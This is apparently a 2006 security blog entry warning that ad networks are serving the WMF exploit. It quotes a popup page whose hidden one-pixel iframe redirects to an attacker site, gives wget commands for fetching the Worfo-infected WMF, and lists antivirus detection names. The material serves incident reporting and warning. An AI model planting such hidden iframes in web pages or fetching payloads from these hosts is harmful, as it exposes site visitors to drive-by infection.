Jan 1st, 2006.

Apparently trojan writers have infected the ad networks with trojans that exploit the unpatched WMF vulnerability.

Jan 1st I got my first WMF block alert from Surfcontrol.

Per the logs, I saw a user get a pop up;
WGET http://www9.paypopup.com/srp99/srp99.htm


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE> srp99 </TITLE>
<META NAME="Generator" CONTENT="EditPlus">
<META NAME="Author" CONTENT="">
<META NAME="Keywords" CONTENT="">
<META NAME="Description" CONTENT="">
</HEAD>

<BODY>
<IFRAME SRC=http://www.srp99.biz/cd/?affiliate=101 HEIGHT="1" WIDTH="1" FRAMEBORDER="0"><IFRAME>
</BODY>
</HTML>



This then linked to load a WMF;

wget www.srp99.biz/tape/101.wmf


This WMF is infected with Worfo.
 Also known as Bloodhound.Exploit.56 (Norton), TROJ_NASCENE.GEN (Trend), Exploit.Win32.IMG-WMF (Kaspersky), Exploit-WMF (McAfee), Exp/WMF-A (Sophos), Win32.Worfo, Win32/Worfo!Trojan, Win32/Worfo.Variant!Trojan
Per http://www3.ca.com/securityadvisor/virusinfo/virus.aspx?id=49998


So I'd say watch out world, it's about to get nasty.


ACMENEWS.COM LLC